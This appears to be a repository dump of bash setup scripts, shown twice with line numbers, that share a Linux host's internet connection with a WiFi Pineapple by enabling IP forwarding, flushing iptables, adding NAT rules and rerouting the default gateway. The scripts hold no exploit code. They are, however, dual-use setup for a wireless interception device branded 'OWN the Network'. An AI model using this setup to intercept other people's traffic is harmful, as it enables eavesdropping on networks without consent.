#Usually correct by default 37 | echo -n "Internet Gateway [$temppineapplegw]: " 38 | read pineapplegw 39 | if [[ $pineapplegw == '' ]]; then 40 | pineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default 41 | fi 42 | 43 | echo -n "IP Address of Host PC [172.16.42.42]: " 44 | read pineapplehostip 45 | if [[ $pineapplehostip == '' ]]; then 46 | pineapplehostip=172.16.42.42 #IP Address of host computer 47 | fi 48 | 49 | echo -n "IP Address of Pineapple [172.16.42.1]: " 50 | read pineappleip 51 | if [[ $pineappleip == '' ]]; then 52 | pineappleip=172.16.42.1 #Thanks Douglas Adams 53 | fi 54 | 55 | #Display settings 56 | #echo Pineapple connected to: $pineapplelan 57 | #echo Internet connection from: $pineapplewan 58 | #echo Internet connection gateway: $pineapplegw 59 | #echo Host Computer IP: $pineapplehostip 60 | #echo Pineapple IP: $pineappleip 61 | #echo Network: $pineapplenet 62 | #echo Netmask: $pineapplenetmask 63 | 64 | echo "" 65 | echo "$(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)\||/$(tput sgr0) Internet: $pineapplegw - $pineapplewan" 66 | echo "$(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3),<><>,$(tput sgr0) Computer: $pineapplehostip" 67 | echo "$(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)'<><>'$(tput sgr0) Pineapple: $pineapplenet - $pineapplelan" 68 | 69 | 70 | #Bring up Ethernet Interface directly connected to Pineapple 71 | ifconfig $pineapplelan $pineapplehostip netmask $pineapplenetmask up 72 | 73 | # Enable IP Forwarding 74 | echo '1' > /proc/sys/net/ipv4/ip_forward 75 | #echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to " 76 | #cat /proc/sys/net/ipv4/ip_forward 77 | 78 | #clear chains and rules 79 | iptables -X 80 | iptables -F 81 | #echo iptables chains and rules cleared 82 | 83 | #setup IP forwarding 84 | iptables -A FORWARD -i $pineapplewan -o $pineapplelan -s $pineapplenet -m state --state NEW -j ACCEPT 85 | iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT 86 | iptables -A POSTROUTING -t nat -j MASQUERADE 87 | #echo IP Forwarding Enabled 88 | 89 | #remove default route 90 | route del default 91 | #echo Default route removed 92 | 93 | #add default gateway 94 | route add default gw $pineapplegw $pineapplewan 95 | #echo Pineapple Default Gateway Configured 96 | 97 | #instructions 98 | #echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan 99 | 100 | #ping -c1 $pineappleip 101 | #if [ $? -eq 0 ]; then 102 | #echo "ICS configuration successful." 103 | #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan" 104 | #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'" 105 | #echo "Enter Pineapple password if prompted" 106 | #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan' 107 | #fi 108 | 109 | echo "" 110 | echo "Browse to http://$pineappleip:1471 -- Happy Hacking!" 111 | echo "" 112 | -------------------------------------------------------------------------------- /wp5.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #define variables 3 | 4 | echo "$(tput setaf 3) _ ___ _______ ____ _ __ " 5 | echo " | | / (_) ____(_) / __ \\(_)___ ___ ____ _____ ____ / /__ " 6 | echo " | | /| / / / /_ / / / /_/ / / __ \/ _ \/ __ '/ __ \/ __ \/ / _ \\" 7 | echo " | |/ |/ / / __/ / / / ____/ / / / / __/ /_/ / /_/ / /_/ / / __/" 8 | echo " |__/|__/_/_/ /_/ /_/ /_/_/ /_/\___/\__,_/ .___/ .___/_/\___/ " 9 | echo " $(tput sgr0) OWN the Network $(tput setaf 3)/_/ /_/$(tput sgr0) v2.2" 10 | echo "" 11 | 12 | echo -n "Pineapple Netmask [255.255.255.0]: " 13 | read pineapplenetmask 14 | if [[ $pineapplenetmask == '' ]]; then 15 | pineapplenetmask=255.255.255.0 #Default netmask for /24 network 16 | fi 17 | 18 | echo -n "Pineapple Network [172.16.42.0/24]: " 19 | read pineapplenet 20 | if [[ $pineapplenet == '' ]]; then 21 | pineapplenet=172.16.42.0/24 # Pineapple network. Default is 172.16.42.0/24 22 | fi 23 | 24 | echo -n "Interface between PC and Pineapple [eth0]: " 25 | read pineapplelan 26 | if [[ $pineapplelan == '' ]]; then 27 | pineapplelan=eth0 # Interface of ethernet cable directly connected to Pineapple 28 | fi 29 | 30 | echo -n "Interface between PC and Internet [wlan0]: " 31 | read pineapplewan 32 | if [[ $pineapplewan == '' ]]; then 33 | pineapplewan=wlan0 #i.e. wlan0 for wifi, ppp0 for 3g modem/dialup, eth0 for lan 34 | fi 35 | 36 | temppineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default 37 | echo -n "Internet Gateway [$temppineapplegw]: " 38 | read pineapplegw 39 | if [[ $pineapplegw == '' ]]; then 40 | pineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default 41 | fi 42 | 43 | echo -n "IP Address of Host PC [172.16.42.42]: " 44 | read pineapplehostip 45 | if [[ $pineapplehostip == '' ]]; then 46 | pineapplehostip=172.16.42.42 #IP Address of host computer 47 | fi 48 | 49 | echo -n "IP Address of Pineapple [172.16.42.1]: " 50 | read pineappleip 51 | if [[ $pineappleip == '' ]]; then 52 | pineappleip=172.16.42.1 #Thanks Douglas Adams 53 | fi 54 | 55 | #Display settings 56 | #echo Pineapple connected to: $pineapplelan 57 | #echo Internet connection from: $pineapplewan 58 | #echo Internet connection gateway: $pineapplegw 59 | #echo Host Computer IP: $pineapplehostip 60 | #echo Pineapple IP: $pineappleip 61 | #echo Network: $pineapplenet 62 | #echo Netmask: $pineapplenetmask 63 | 64 | echo "" 65 | echo "$(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)\||/$(tput sgr0) Internet: $pineapplegw - $pineapplewan" 66 | echo "$(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3),<><>,$(tput sgr0) Computer: $pineapplehostip" 67 | echo "$(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)'<><>'$(tput sgr0) Pineapple: $pineapplenet - $pineapplelan" 68 | 69 | 70 | #Bring up Ethernet Interface directly connected to Pineapple 71 | ifconfig $pineapplelan $pineapplehostip netmask $pineapplenetmask up 72 | 73 | # Enable IP Forwarding 74 | echo '1' > /proc/sys/net/ipv4/ip_forward 75 | #echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to " 76 | #cat /proc/sys/net/ipv4/ip_forward 77 | 78 | #clear chains and rules 79 | iptables -X 80 | iptables -F 81 | #echo iptables chains and rules cleared 82 | 83 | #setup IP forwarding 84 | iptables -A FORWARD -i $pineapplewan -o $pineapplelan -s $pineapplenet -m state --state NEW -j ACCEPT 85 | iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT 86 | iptables -A POSTROUTING -t nat -j MASQUERADE 87 | #echo IP Forwarding Enabled 88 | 89 | #remove default route 90 | route del default 91 | #echo Default route removed 92 | 93 | #add default gateway 94 | route add default gw $pineapplegw $pineapplewan 95 | #echo Pineapple Default Gateway Configured 96 | 97 | #instructions 98 | #echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan 99 | 100 | #ping -c1 $pineappleip 101 | #if [ $? -eq 0 ]; then 102 | #echo "ICS configuration successful." 103 | #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan" 104 | #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'" 105 | #echo "Enter Pineapple password if prompted" 106 | #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan' 107 | #fi 108 | 109 | echo "" 110 | echo "Browse to http://$pineappleip:1471" 111 | echo "" 112 | --------------------------------------------------------------------------------